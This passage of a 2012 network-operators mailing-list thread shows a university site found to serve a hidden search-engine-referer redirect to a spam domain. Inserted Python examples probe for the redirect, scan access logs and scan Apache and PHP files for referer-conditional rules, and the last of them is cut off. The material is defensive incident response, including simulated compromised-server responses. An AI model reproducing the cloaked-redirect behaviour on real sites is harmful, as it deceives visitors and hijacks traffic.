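    if referer and any(se in referer for se in ("google", "bing", "yahoo")):
        return 301, "http://www.couchtarts.com/media.php"
    return 200, None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    fetch = http_fetch if target else constructed_fetch
    results = probe(target or "http://placeholder.invalid/", fetch)
    for ref, (status, location) in results.items():
        print(f"{ref:<26} {status} {location or ''}")
    flagged = referer_dependent(results)
    print("referer-dependent:", sorted(flagged) if flagged else "no")
```

Run it with your own site's URL as the first argument to use the real network; with no argument it exercises the logic against the constructed responses.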


RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Yes, thanks. I'll have to read up on that.

My e-mail was showing extra stuff at the end of the sample command lines, which 
confused me:

Airy:~ user$ curl -e 'http://google.com' csulb.edu  
...###

Sigh, I just Outlook not to strip extra line breaks.


matthew black
information technology services
california state university, long beach



-Original Message-
From: John Levine [mailto:jo...@iecc.com] 
Sent: Tuesday, June 26, 2012 10:30 PM
To: nanog@nanog.org
Cc: Matthew Black
Subject: Re: DNS poisoning at Google?

In article 
 you 
write:
>I'm not familiar with curl and don't understand what I type and what 
>are results. Are you suggesting that when google refers to our website, we 
>pick that up and redirect to couchtarts?

curl is a command line www client that's worth knowing about.

And I observe the same thing, using my own local DNS cache -- if I fetch the 
home page from csulb.edu or www.csulb.edu with Google as the referrer, it 
returns a page that redirects to couchtarts.

Sorry, dude, you've been pwn3d.

R's,
John


>Airy:~ user$ curl -e 'http://google.com' csulb.edu
><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
><html><head>
><title>301 Moved Permanently</title>
></head><body>
><h1>Moved Permanently</h1>
><p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
></body></html>




Re: DNS poisoning at Google?

2012-06-26 Thread Christopher Morrow
On Wed, Jun 27, 2012 at 1:26 AM, Matthew Black  wrote:
> Thank you for that helpful instruction!
>
> curl doesn't work because our webserver is firewalled against outbound 
> traffic. The telnet to port 80 showed me the problem. I also didn't 
> understand when output was placed at the end of the command line, instead of 
> starting on the next line...that looked like something I was supposed to type.
>

sorry... often when I end up testing something like this I cut/paste
from a buffer, so:

telnet bloop 80



read-output... In the case of your server:

GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/


all gets pasted once the 'telnet www.csulb.edu 80' connects...

the output is the stuff that includes the 'redirect to couchtarts'.

-chris


>
> matthew black
> information technology services
> california state university, long beach
>
> -Original Message-
> From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
> Behalf Of Christopher Morrow
> Sent: Tuesday, June 26, 2012 10:17 PM
> To: Ishmael Rufus
> Cc: Matthew Black; nanog@nanog.org; Jeremy Hanmer
> Subject: Re: DNS poisoning at Google?
>
> for example, from the commandline with telnet:
>
> morrowc@teensy:~$ telnet www.csulb.edu 80 Trying 134.139.1.60...
> Connected to gaggle.its.csulb.edu.
> Escape character is '^]'.
> GET / HTTP/1.0
> Host: www.csulb.edu
> Referer: http://www.google.com/
>
>
>
> HTTP/1.1 301 Moved Permanently
> Date: Wed, 27 Jun 2012 05:04:04 GMT
> Server: Apache/2.0.63
> Location: http://www.couchtarts.com/media.php
> Content-Length: 243
> Connection: close
> Content-Type: text/html; charset=iso-8859-1
>
>  
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved  href="http://www.couchtarts.com/media.php";>here.
> 
> Connection closed by foreign host.
>
>
> oops :( fail.
>
> On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
>> Invoking the referrer on your site recommends a redirect to
>> couchtarts. I agree with Jeremy and Jeff check your htaccess files,
>> conf files and anything that  calls RewriteCond or Rewrite
>>
>> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
>> wrote:
>>
>>> Google Webtools reports a problem with our HOMEPAGE "/". That page is
>>> not redirecting anywhere.
>>> They also report problems with some 48 other primary sites, none of
>>> which redirect to the offending couchtarts.
>>>
>>> matthew black
>>> information technology services
>>> california state university, long beach
>>>
>>>
>>>
>>>
>>>
>>> -Original Message-
>>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>>> Sent: Tuesday, June 26, 2012 9:58 PM
>>> To: Matthew Black
>>> Cc: nanog@nanog.org
>>> Subject: Re: DNS poisoning at Google?
>>>
>>> It's not DNS.  If you're sure there's no htaccess files in place,
>>> check your content (even that stored in a database) for anything that
>>> might be altering data based on referrer.  This simple test shows what I 
>>> mean:
>>>
>>> Airy:~ user$ curl -e 'http://google.com' csulb.edu >> PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>>> 301 Moved Permanently
>>> 
>>> Moved Permanently
>>> The document has moved >> href="http://www.couchtarts.com/media.php
>>> ">here.
>>> 
>>>
>>> Running curl without the -e argument gives the proper site contents.
>>>
>>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>>> wrote:
>>>
>>> > Running Apache on three Solaris webservers behind a load balancer.
>>> > No MS
>>> Windows!
>>> >
>>> > Not sure how malicious software could get between our load balancer
>>> > and
>>> Unix servers. Thanks for the tip!
>>> >
>>> > matthew black
>>> > information technology services
>>> > california state university, long beach
>>> >
>>> >
>>> >
>>> > From: Landon Stewart [mailto:lstew...@superb.net]
>>> > Sent: Tuesday, June 26, 2012 9:07 PM
>>> > To: Matthew Black
>>> > Cc: nanog@nanog.org
>>> > Subject: Re: DNS poisoning at Google?
>>> >
>>> > Is it possible that some malicious software is listening and
>>> > injecting a
>>> redirect on the wire?  We've seen this before with a W

Re: DNS poisoning at Google?

2012-06-26 Thread John Levine
In article 
 you 
write:
>I'm not familiar with curl and don't understand what I type and what are 
>results. Are you suggesting that when
>google refers to our website, we pick that up and redirect to couchtarts?

curl is a command line www client that's worth knowing about.

And I observe the same thing, using my own local DNS cache -- if I
fetch the home page from csulb.edu or www.csulb.edu with Google as the
referrer, it returns a page that redirects to couchtarts.

Sorry, dude, you've been pwn3d.

R's,
John


>Airy:~ user$ curl -e 'http://google.com' csulb.edu
><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
><html><head>
><title>301 Moved Permanently</title>
></head><body>
><h1>Moved Permanently</h1>
><p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
></body></html>




RE: DNS poisoning at Google?

2012-06-26 Thread Matthew Black
Thank you for that helpful instruction!

curl doesn't work because our webserver is firewalled against outbound traffic. 
The telnet to port 80 showed me the problem. I also didn't understand when 
output was placed at the end of the command line, instead of starting on the 
next line...that looked like something I was supposed to type.


matthew black
information technology services
california state university, long beach

-Original Message-
From: christopher.mor...@gmail.com [mailto:christopher.mor...@gmail.com] On 
Behalf Of Christopher Morrow
Sent: Tuesday, June 26, 2012 10:17 PM
To: Ishmael Rufus
Cc: Matthew Black; nanog@nanog.org; Jeremy Hanmer
Subject: Re: DNS poisoning at Google?

for example, from the commandline with telnet:

morrowc@teensy:~$ telnet www.csulb.edu 80
Trying 134.139.1.60...
Connected to gaggle.its.csulb.edu.
Escape character is '^]'.
GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/



HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:04:04 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Content-Length: 243
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>
Connection closed by foreign host.


oops :( fail.

On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
> Invoking the referrer on your site recommends a redirect to 
> couchtarts. I agree with Jeremy and Jeff check your htaccess files, 
> conf files and anything that  calls RewriteCond or Rewrite
>
> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
> wrote:
>
>> Google Webtools reports a problem with our HOMEPAGE "/". That page is 
>> not redirecting anywhere.
>> They also report problems with some 48 other primary sites, none of 
>> which redirect to the offending couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>>
>>
>> -Original Message-
>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>> Sent: Tuesday, June 26, 2012 9:58 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> It's not DNS.  If you're sure there's no htaccess files in place, 
>> check your content (even that stored in a database) for anything that 
>> might be altering data based on referrer.  This simple test shows what I 
>> mean:
>>
>> Airy:~ user$ curl -e 'http://google.com' csulb.edu > PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
>> 301 Moved Permanently
>> 
>> Moved Permanently
>> The document has moved > href="http://www.couchtarts.com/media.php
>> ">here.
>> 
>>
>> Running curl without the -e argument gives the proper site contents.
>>
>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>> wrote:
>>
>> > Running Apache on three Solaris webservers behind a load balancer. 
>> > No MS
>> Windows!
>> >
>> > Not sure how malicious software could get between our load balancer 
>> > and
>> Unix servers. Thanks for the tip!
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> >
>> >
>> >
>> > From: Landon Stewart [mailto:lstew...@superb.net]
>> > Sent: Tuesday, June 26, 2012 9:07 PM
>> > To: Matthew Black
>> > Cc: nanog@nanog.org
>> > Subject: Re: DNS poisoning at Google?
>> >
>> > Is it possible that some malicious software is listening and 
>> > injecting a
>> redirect on the wire?  We've seen this before with a Windows machine 
>> being infected.
>> > On 26 June 2012 20:53, Matthew Black > matthew.bl...@csulb.edu>> wrote:
>> > Google Safe Browsing and Firefox have marked our website as 
>> > containing
>> malware. They claim our home page returns no results, but redirects 
>> users to another compromised website couchtarts.com<http://couchtarts.com>.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files 
>> > and
>> are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach 
>> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> >
>> >
>> >
>> > --
>> > Landon Stewart mailto:lstew...@superb.net>>
>> > Sr. Administrator
>> > Systems Engineering
>> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more 
>> > "Ahead of the Rest":
>> > http://www.superbhosting.net<http://www.superbhosting.net/>
>> >
>>
>>
>>
>>
>>





Re: DNS poisoning at Google?

2012-06-26 Thread Chris Griffin
Also shows a redirect if you use bing.com or yahoo.com (and probably others) 
but not, for instance, blah.com...

Tnx
Chris

On Jun 27, 2012, at 1:13 AM, David Hubbard wrote:

> Well as Jeremy pointed out, your site is issuing
> redirects, he gave you the command to show it:
> 
> curl -e 'http://google.com' csulb.edu
> 
> So if you're sure your server(s) haven't been hacked,
> your application appears to have been hacked.  It only
> issues the redirect if the visitor comes in from a
> google search.
> 
> 
> 
> 
>> -Original Message-
>> From: Matthew Black [mailto:matthew.bl...@csulb.edu] 
>> Sent: Wednesday, June 27, 2012 1:03 AM
>> To: Michael J Wise
>> Cc: nanog@nanog.org
>> Subject: RE: DNS poisoning at Google?
>> 
>> Q:have you consulted the logs?
>> 
>> Seriously? Our servers have multiple log files due to 
>> multiple virtual hosts. Our primary domain log file on just 
>> one server has over 600,000 records x 3 servers.
>> 
>> Probably over 100,000 304 redirects in our logs.
>> 
>> couchtarts.com does not appear in our log files.
>> 
>> 
>> matthew black
>> information technology services
>> california state university, long beach
>> 
>> -----Original Message-
>> From: Michael J Wise [mailto:mjw...@kapu.net] 
>> Sent: Tuesday, June 26, 2012 9:56 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>> 
>> 
>> On Jun 26, 2012, at 9:35 PM, Matthew Black wrote:
>> 
>>> Yes, we've used the Google Webmaster Tools a lot today. 
>> Submitted multiple requests and they keep insisting that our 
>> site issues a redirect. Unable to duplicate the problem here.
>> 
>> ... have you consulted the logs?
>> If the redirect is there, it ... 1) might not be from the 
>> home page, and 2) could be in ... user content?
>> 
>> awk '{if ($9 ~ /304/) { print $0 }}' access_log.
>> ... or some such.
>> Granted, might be a storm of " " -> index.html redirects, but 
>> they should be grep -v 'able in short order.
>> You might also look for the rDNS of the Google spider to see 
>> exactly where it is looking, and what it sees.
>> 
>> Aloha,
>> Michael.
>> -- 
>> "Please have your Internet License 
>> and Usenet Registration handy..."
>> 
>> 
>> 
>> 
>> 
>> 
> 


---
Chris Griffin   cgrif...@ufl.edu
Sr. Network Engineer - CCNP Phone: (352) 273-1051
CNS - Network Services  Fax:   (352) 392-9440
University of Florida/FLR   Gainesville, FL 32611
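Michael Wise's awk filter on the status field, carried further as an added example that is not from the thread: a parser for Apache's combined log format that counts the 301s the thread observed on "/" per referring host and separates search-engine referers from everything else, so a redirect that only search-engine visitors receive stands out even though the redirect target never appears in the log (the combined format records status and Referer, not the Location header). The log lines are constructed samples with documentation-range client addresses, not anyone's real logs.

```python
"""Access-log scan for referer-conditional redirects (added example, not from the thread)."""
import re
from collections import Counter
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Apache "combined" log format:
#   host ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Referring hosts the thread saw trigger the redirect (blah.com did not).
SEARCH_ENGINE_MARKERS = ("google.", "bing.", "yahoo.")

# Constructed sample lines: documentation-range IPs, invented timestamps.
SAMPLE_LOG = [
    '198.51.100.7 - - [27/Jun/2012:05:04:04 +0000] "GET / HTTP/1.0" 301 243 "http://www.google.com/" "Mozilla/5.0"',
    '198.51.100.8 - - [27/Jun/2012:05:05:10 +0000] "GET / HTTP/1.1" 200 15234 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Jun/2012:05:06:31 +0000] "GET / HTTP/1.1" 301 243 "http://www.bing.com/search?q=csulb" "Mozilla/5.0"',
    '192.0.2.21 - - [27/Jun/2012:05:07:02 +0000] "GET / HTTP/1.1" 200 15234 "http://blah.com/" "curl/7.24.0"',
    '192.0.2.22 - - [27/Jun/2012:05:07:45 +0000] "GET / HTTP/1.1" 301 243 "http://search.yahoo.com/search?p=csulb" "Mozilla/5.0"',
    '192.0.2.23 - - [27/Jun/2012:05:08:12 +0000] "GET /news HTTP/1.1" 301 233 "-" "Mozilla/5.0"',
    '192.0.2.24 - - [27/Jun/2012:05:09:00 +0000] "GET /logo.png HTTP/1.1" 304 0 "http://www.csulb.edu/" "Mozilla/5.0"',
    'this line is not in combined format and is skipped',
]


def parse_line(line: str) -> Optional[dict]:
    """Parse one combined-format line; None if it does not match."""
    m = COMBINED.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = rec["request"].split()          # "GET / HTTP/1.0" -> method, path, protocol
    rec["path"] = parts[1] if len(parts) >= 2 else ""
    rec["referer_host"] = urlsplit(rec["referer"]).hostname or "-"  # "-" = no referer
    return rec


def redirects_by_referer(lines: List[str], status: int = 301,
                         path: Optional[str] = "/") -> Dict[str, Counter]:
    """Count responses with `status` (only for `path` unless path is None) per
    referring host, split into search-engine referers and everything else."""
    buckets = {"search_engine": Counter(), "other": Counter()}
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["status"] != status:
            continue
        if path is not None and rec["path"] != path:
            continue
        host = rec["referer_host"]
        bucket = "search_engine" if any(m in host for m in SEARCH_ENGINE_MARKERS) else "other"
        buckets[bucket][host] += 1
    return buckets


def looks_conditional(buckets: Dict[str, Counter]) -> bool:
    """True when every counted redirect arrived behind a search-engine referer:
    the server is choosing its answer by Referer, which a clean site has no reason to do."""
    return bool(buckets["search_engine"]) and not buckets["other"]


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
            lines = f.read().splitlines()
    else:
        lines = SAMPLE_LOG
    found = redirects_by_referer(lines)
    for bucket, counts in found.items():
        print(bucket, dict(counts))
    print("referer-conditional redirect on /:", looks_conditional(found))
```

Pass an access_log path as the first argument to scan a real file; legitimate redirects on other paths (the trailing-slash kind) are kept out of the "/" count by the path filter.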






Re: DNS poisoning at Google?

2012-06-26 Thread David Miller
On 6/27/2012 1:13 AM, Matthew Black wrote:
> I'm not familiar with curl and don't understand what I type and what are 
> results. Are you suggesting that when google refers to our website, we pick 
> that up and redirect to couchtarts?
>
> matthew black
> information technology services
> california state university, long beach

Referer is an HTTP header that can be included in requests to your web
server
  - http://en.wikipedia.org/wiki/HTTP_referer

"man curl"

       -e, --referer <URL>
              (HTTP) Sends the "Referer Page" information to the HTTP server. This can also be set with the -H, --header flag of
              course. When used with -L, --location you can append ";auto" to the --referer URL to make curl automatically set the
              previous URL when it follows a Location: header. The ";auto" string can be used alone, even if you don't set an
              initial --referer.


$ curl -v -e 'http://google.com' csulb.edu
* About to connect() to csulb.edu port 80 (#0)
*   Trying 134.139.1.60...
* connected
* Connected to csulb.edu (134.139.1.60) port 80 (#0)
> GET / HTTP/1.1
> User-Agent: curl/7.24.0 (x86_64-pc-linux-gnu) libcurl/7.24.0 OpenSSL/1.0.0g zlib/1.2.5
> Host: csulb.edu
> Accept: */*
> Referer: http://google.com
>
< HTTP/1.1 301 Moved Permanently
< Date: Wed, 27 Jun 2012 05:11:39 GMT
< Server: Apache/2.0.63
< Location: http://www.couchtarts.com/media.php
< Content-Length: 243
< Connection: close
< Content-Type: text/html; charset=iso-8859-1
<
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>
* Closing connection #0


-DMM

>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jer...@hq.newdream.net] 
> Sent: Tuesday, June 26, 2012 9:59 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> It's not DNS.  If you're sure there's no htaccess files in place, check your 
> content (even that stored in a database) for anything that might be altering 
> data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved  href="http://www.couchtarts.com/media.php";>here.
> 
>
> Running curl without the -e argument gives the proper site contents.  
>
> On Jun 26, 2012, at 9:35 PM, Matthew Black  wrote:
>
>> Yes, we've used the Google Webmaster Tools a lot today. Submitted multiple 
>> requests and they keep insisting that our site issues a redirect. Unable to 
>> duplicate the problem here.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>> From: Ishmael Rufus [mailto:sakam...@gmail.com]
>> Sent: Tuesday, June 26, 2012 9:34 PM
>> To: Matthew Black
>> Cc: David Hubbard; nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> Have you tried using Google Webmaster tools?
>> On Tue, Jun 26, 2012 at 11:28 PM, Matthew Black 
>> mailto:matthew.bl...@csulb.edu>> wrote:
>> Running Apache on three Solaris servers behind a load balancer.
>>
>> I forgot how to lookup our AS number to see if it matches couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>> -Original Message-
>> From: David Hubbard 
>> [mailto:dhubb...@dino.hostasaurus.com<mailto:dhubbard@dino.hostasaurus
>> .com>]
>> Sent: Tuesday, June 26, 2012 9:14 PM
>> To: nanog@nanog.org<mailto:nanog@nanog.org>
>> Subject: RE: DNS poisoning at Google?
>>
>> Typically if google were pulling your site sometimes from the wrong IP, 
>> their safe browsing page should indicate it being on another AS number in 
>> addition to the correct one 2152:
>>
>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
>> tp ://www.csulb.edu<http://www.csulb.edu>
>>
>> For example, the couchtarts site they claim yours is redirecting to:
>>
>> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=ht
>> tp ://www.couchtarts.com<http://www.couchtarts.com>
>>
>> That site's DNS is screwed up and some requests are sent to a different IP 
>> at a different host, so Google picked up both AS numbers.
>>
>> Could one of your domain's subdomains be what is actually infected?  You 
>> seem to have a bunch of them, maybe google is penalizing the whole domain 
>&g

Re: DNS poisoning at Google?

2012-06-26 Thread Christopher Morrow
for example, from the commandline with telnet:

morrowc@teensy:~$ telnet www.csulb.edu 80
Trying 134.139.1.60...
Connected to gaggle.its.csulb.edu.
Escape character is '^]'.
GET / HTTP/1.0
Host: www.csulb.edu
Referer: http://www.google.com/



HTTP/1.1 301 Moved Permanently
Date: Wed, 27 Jun 2012 05:04:04 GMT
Server: Apache/2.0.63
Location: http://www.couchtarts.com/media.php
Content-Length: 243
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.couchtarts.com/media.php">here</a>.</p>
</body></html>
Connection closed by foreign host.


oops :( fail.

On Wed, Jun 27, 2012 at 1:13 AM, Ishmael Rufus  wrote:
> Invoking the referrer on your site recommends a redirect to couchtarts. I
> agree with Jeremy and Jeff check your htaccess files, conf files and
> anything that  calls RewriteCond or Rewrite
>
> On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black 
> wrote:
>
>> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
>> redirecting anywhere.
>> They also report problems with some 48 other primary sites, none of which
>> redirect to the offending couchtarts.
>>
>> matthew black
>> information technology services
>> california state university, long beach
>>
>>
>>
>>
>>
>> -Original Message-
>> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
>> Sent: Tuesday, June 26, 2012 9:58 PM
>> To: Matthew Black
>> Cc: nanog@nanog.org
>> Subject: Re: DNS poisoning at Google?
>>
>> It's not DNS.  If you're sure there's no htaccess files in place, check
>> your content (even that stored in a database) for anything that might be
>> altering data based on referrer.  This simple test shows what I mean:
>>
>> Airy:~ user$ curl -e 'http://google.com' csulb.edu > "-//IETF//DTD HTML 2.0//EN"> 
>> 301 Moved Permanently
>> 
>> Moved Permanently
>> The document has moved http://www.couchtarts.com/media.php
>> ">here.
>> 
>>
>> Running curl without the -e argument gives the proper site contents.
>>
>> On Jun 26, 2012, at 9:24 PM, Matthew Black 
>> wrote:
>>
>> > Running Apache on three Solaris webservers behind a load balancer. No MS
>> Windows!
>> >
>> > Not sure how malicious software could get between our load balancer and
>> Unix servers. Thanks for the tip!
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> >
>> >
>> >
>> > From: Landon Stewart [mailto:lstew...@superb.net]
>> > Sent: Tuesday, June 26, 2012 9:07 PM
>> > To: Matthew Black
>> > Cc: nanog@nanog.org
>> > Subject: Re: DNS poisoning at Google?
>> >
>> > Is it possible that some malicious software is listening and injecting a
>> redirect on the wire?  We've seen this before with a Windows machine being
>> infected.
>> > On 26 June 2012 20:53, Matthew Black > matthew.bl...@csulb.edu>> wrote:
>> > Google Safe Browsing and Firefox have marked our website as containing
>> malware. They claim our home page returns no results, but redirects users
>> to another compromised website couchtarts.com<http://couchtarts.com>.
>> >
>> > We have thoroughly examined our root .htaccess and httpd.conf files and
>> are not redirecting to the problem target site. No recent changes either.
>> >
>> > We ran some NSLOOKUPs against various public DNS servers and
>> intermittently get results that are NOT our servers.
>> >
>> > We believe the DNS servers used by Google's crawler have been poisoned.
>> >
>> > Can anyone shed some light on this?
>> >
>> > matthew black
>> > information technology services
>> > california state university, long beach
>> > www.csulb.edu<http://www.csulb.edu><http://www.csulb.edu>
>> >
>> >
>> >
>> > --
>> > Landon Stewart mailto:lstew...@superb.net>>
>> > Sr. Administrator
>> > Systems Engineering
>> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
>> > of the Rest":
>> > http://www.superbhosting.net<http://www.superbhosting.net/>
>> >
>>
>>
>>
>>
>>



Re: DNS poisoning at Google?

2012-06-26 Thread Ishmael Rufus
Invoking the referrer on your site recommends a redirect to couchtarts. I
agree with Jeremy and Jeff: check your htaccess files, conf files and
anything that calls RewriteCond or Rewrite.

On Wed, Jun 27, 2012 at 12:05 AM, Matthew Black wrote:

> Google Webtools reports a problem with our HOMEPAGE "/". That page is not
> redirecting anywhere.
> They also report problems with some 48 other primary sites, none of which
> redirect to the offending couchtarts.
>
> matthew black
> information technology services
> california state university, long beach
>
>
>
>
>
> -Original Message-
> From: Jeremy Hanmer [mailto:jeremy.han...@dreamhost.com]
> Sent: Tuesday, June 26, 2012 9:58 PM
> To: Matthew Black
> Cc: nanog@nanog.org
> Subject: Re: DNS poisoning at Google?
>
> It's not DNS.  If you're sure there's no htaccess files in place, check
> your content (even that stored in a database) for anything that might be
> altering data based on referrer.  This simple test shows what I mean:
>
> Airy:~ user$ curl -e 'http://google.com' csulb.edu  "-//IETF//DTD HTML 2.0//EN"> 
> 301 Moved Permanently
> 
> Moved Permanently
> The document has moved http://www.couchtarts.com/media.php
> ">here.
> 
>
> Running curl without the -e argument gives the proper site contents.
>
> On Jun 26, 2012, at 9:24 PM, Matthew Black 
> wrote:
>
> > Running Apache on three Solaris webservers behind a load balancer. No MS
> Windows!
> >
> > Not sure how malicious software could get between our load balancer and
> Unix servers. Thanks for the tip!
> >
> > matthew black
> > information technology services
> > california state university, long beach
> >
> >
> >
> > From: Landon Stewart [mailto:lstew...@superb.net]
> > Sent: Tuesday, June 26, 2012 9:07 PM
> > To: Matthew Black
> > Cc: nanog@nanog.org
> > Subject: Re: DNS poisoning at Google?
> >
> > Is it possible that some malicious software is listening and injecting a
> redirect on the wire?  We've seen this before with a Windows machine being
> infected.
> > On 26 June 2012 20:53, Matthew Black wrote:
> > Google Safe Browsing and Firefox have marked our website as containing
> malware. They claim our home page returns no results, but redirects users
> to another compromised website couchtarts.com.
> >
> > We have thoroughly examined our root .htaccess and httpd.conf files and
> are not redirecting to the problem target site. No recent changes either.
> >
> > We ran some NSLOOKUPs against various public DNS servers and
> intermittently get results that are NOT our servers.
> >
> > We believe the DNS servers used by Google's crawler have been poisoned.
> >
> > Can anyone shed some light on this?
> >
> > matthew black
> > information technology services
> > california state university, long beach
> > www.csulb.edu
> >
> >
> >
> > --
> > Landon Stewart <lstew...@superb.net>
> > Sr. Administrator
> > Systems Engineering
> > Superb Internet Corp - 888-354-6128 x 4199 Web hosting and more "Ahead
> > of the Rest":
> > http://www.superbhosting.net
> >
>
>
>
>
>
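Ishmael's advice above (look at the htaccess and conf files for RewriteCond/RewriteRule) can be made repeatable, and two things a practitioner checks that the thread's "root .htaccess and httpd.conf" review does not: Apache honours a .htaccess in every subdirectory of the document root, not just the top-level one, and the same referrer-keyed redirect can live in application code (PHP here) rather than in configuration. The scanner below is an added example, not code from this thread or from any of the posters. The demo tree it builds, the file contents in it and the `redirect-target.example` hostname are all constructed placeholders; the rule names are my own.

```python
"""Scan a document root for referrer-conditional redirects.

Added example, not code from the NANOG thread.  Walks every .htaccess,
*.conf and PHP file under a root (all depths, dotfiles included) and flags
Apache directives that branch on the Referer/User-Agent or redirect
off-site, plus PHP files that both read HTTP_REFERER and emit a Location
header.  The demo tree and its contents are constructed; the hostname
redirect-target.example is a placeholder.
"""
import re
import tempfile
from pathlib import Path

# Apache configuration lines that branch on the visitor or redirect off-site.
APACHE_RULES = [
    ("referer-condition", re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}", re.I)),
    ("user-agent-condition", re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I)),
    ("rewrite-to-external", re.compile(r"^\s*RewriteRule\s+\S+\s+https?://", re.I)),
    ("redirect-to-external", re.compile(r"^\s*Redirect(?:Match|Permanent|Temp)?\s+.*https?://", re.I)),
]
# PHP: reading the Referer and emitting a Location header in the same file.
PHP_REFERER = re.compile(r"\$_SERVER\s*\[\s*['\"]HTTP_REFERER['\"]\s*\]")
PHP_LOCATION = re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I)

APACHE_NAMES, APACHE_SUFFIXES, PHP_SUFFIXES = {".htaccess"}, {".conf"}, {".php", ".inc"}


def scan_apache(text):
    """(rule, line number, line) for every non-comment line matching a rule."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue
        hits.extend((name, lineno, line.strip()) for name, rx in APACHE_RULES if rx.search(line))
    return hits


def scan_php(text):
    """Flag a PHP file only when it both reads the Referer and sets Location."""
    if not (PHP_REFERER.search(text) and PHP_LOCATION.search(text)):
        return []
    return [("php-referer-redirect", lineno, line.strip())
            for lineno, line in enumerate(text.splitlines(), 1)
            if PHP_REFERER.search(line) or PHP_LOCATION.search(line)]


def scan_tree(root):
    """Walk `root` and map relative path -> hits for every file that has any."""
    root = Path(root)
    findings = {}
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="replace")
        if path.name in APACHE_NAMES or path.suffix in APACHE_SUFFIXES:
            hits = scan_apache(text)
        elif path.suffix in PHP_SUFFIXES:
            hits = scan_php(text)
        else:
            continue
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


# Constructed demo tree: a clean root .htaccess (internal redirect only), a
# planted one two levels down, and an include file doing the same job in PHP.
DEMO_FILES = {
    ".htaccess": "RewriteEngine On\nRewriteRule ^old$ /new [R=301,L]\n",
    "media/cache/.htaccess": (
        "RewriteEngine On\n"
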